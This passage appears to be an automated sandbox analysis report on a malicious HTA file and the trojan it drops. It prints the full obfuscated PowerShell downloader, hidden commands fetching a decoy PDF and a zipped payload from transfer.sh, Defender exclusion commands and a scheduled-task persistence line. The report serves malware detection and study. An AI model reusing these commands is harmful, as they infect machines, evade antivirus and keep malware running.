Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.csBase64 encoded string: 'QpP1iOqD4Mk1Ae4wKbuPlhTy98PYpVJ8pfMige9qGxk17h3ZXnxYwllGPcs8fBdhkHuR', 'IefPsHFDPqac8COzAalVTBetyiEdNi3X9JmzkjuNuZ31DBpefI27Pq9t1n6gSGv9sjVr', 'KdBZpkgMeykZQg75JLdgJ3Q56nTKrZUVkahS3N08FYrDLTSKhp7SptRWIXJH3ZxEKuA7', 'rkWrqL0EUSR1XArjS07wBh2Nkt3j70GkFiDwApmeIiXAVLGK4I5zs0p8teL3HkCHOLTc'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 17.2.msword.com.217627b0000.1.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.2.msword.com.217627b0000.1.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@49/77@2/4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\c.batJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8704:120:WilError_03
Source: C:\Users\user\AppData\Roaming\msword.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comMutant created: \Sessions\1\BaseNamedObjects\XsoF5rqXUPFdPKmF
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8412:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0u2tw1ul.scp.ps1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comFile opened: C:\Windows\system32\ef872a1cc4054b9e91374ce2398fe887f96e2257f4d70acc32bbfc60dca1f2aaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Users\user\AppData\Roaming\msword.exeFile opened: C:\Windows\system32\f397ce93dd277700a3962663030d019a6c4f55856f49f0cea0e5dbc8d6de42c8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" "
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: p5.htaReversingLabs: Detection: 39%
Source: p5.htaVirustotal: Detection: 40%
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\p5.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\W2.pdf
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/WD631pf02G/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1572,i,10869719346348380041,10864435701899578402,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.com msword.com
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.com'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msword.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\msword.exe C:\Users\user\AppData\Roaming\msword.exe
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\W2.pdfJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/WD631pf02G/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.com msword.com Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1572,i,10869719346348380041,10864435701899578402,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.com'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msword.exe'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.exe'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: 17.2.msword.com.217627b0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.BOXF0UzLJrnMdvLnTSuKUKfvlV3AqPIFo9MVsQpRCw8wLmUyEfEXSrVzKvVjbPJzS4,HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.udSF3xHLAmmgoluSJFZf1q0yE54OB3SQpZ7dmvLyx0pyH9zU6K9fAhmjjvrXD7P841,HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.GCk3fvvvmrvgrqvRRwCZWNiGV7gNSsqyJj9ykrz8vrzwtlzPFrHEk6JP5LAiQI7JUR,HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.Mr427ibBXwP6okvwA0M6KHViWDyva5jv7x00vAvsGTCJXL3udExohAiY4E4oCYSovK,_5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.dvs1AR3MYw1uIzYYgPM4EMQ2vKSzPm5LwAu3UiHVzos2OmwGIVJfyGbAjmhvn2ReJxh7jK8CGVN5kT5tks3LxTE1Kf()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 17.2.msword.com.217627b0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{k9oflN72PIwhuwmzROmTtp56zF[2],_5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.vTq2vhZVED4CV1a59houBtVgBzUSXDYpO53HaM0mLOQ7Qo9dWwcwsdGZrSFT7LRDTcfVbdgea1QNxdK6hLKxRsF2WS(Convert.FromBase64String(k9oflN72PIwhuwmzROmTtp56zF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 17.2.msword.com.217627b0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { k9oflN72PIwhuwmzROmTtp56zF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.BOXF0UzLJrnMdvLnTSuKUKfvlV3AqPIFo9MVsQpRCw8wLmUyEfEXSrVzKvVjbPJzS4,HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.udSF3xHLAmmgoluSJFZf1q0yE54OB3SQpZ7dmvLyx0pyH9zU6K9fAhmjjvrXD7P841,HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.GCk3fvvvmrvgrqvRRwCZWNiGV7gNSsqyJj9ykrz8vrzwtlzPFrHEk6JP5LAiQI7JUR,HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.Mr427ibBXwP6okvwA0M6KHViWDyva5jv7x00vAvsGTCJXL3udExohAiY4E4oCYSovK,_5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.dvs1AR3MYw1uIzYYgPM4EMQ2vKSzPm5LwAu3UiHVzos2OmwGIVJfyGbAjmhvn2ReJxh7jK8CGVN5kT5tks3LxTE1Kf()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{k9oflN72PIwhuwmzROmTtp56zF[2],_5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.vTq2vhZVED4CV1a59houBtVgBzUSXDYpO53HaM0mLOQ7Qo9dWwcwsdGZrSFT7LRDTcfVbdgea1QNxdK6hLKxRsF2WS(Convert.FromBase64String(k9oflN72PIwhuwmzROmTtp56zF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { k9oflN72PIwhuwmzROmTtp56zF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.BOXF0UzLJrnMdvLnTSuKUKfvlV3AqPIFo9MVsQpRCw8wLmUyEfEXSrVzKvVjbPJzS4,HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.udSF3xHLAmmgoluSJFZf1q0yE54OB3SQpZ7dmvLyx0pyH9zU6K9fAhmjjvrXD7P841,HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.GCk3fvvvmrvgrqvRRwCZWNiGV7gNSsqyJj9ykrz8vrzwtlzPFrHEk6JP5LAiQI7JUR,HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.Mr427ibBXwP6okvwA0M6KHViWDyva5jv7x00vAvsGTCJXL3udExohAiY4E4oCYSovK,_5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.dvs1AR3MYw1uIzYYgPM4EMQ2vKSzPm5LwAu3UiHVzos2OmwGIVJfyGbAjmhvn2ReJxh7jK8CGVN5kT5tks3LxTE1Kf()}}, (string[])null, (Type[])null, (bool[])null, true)
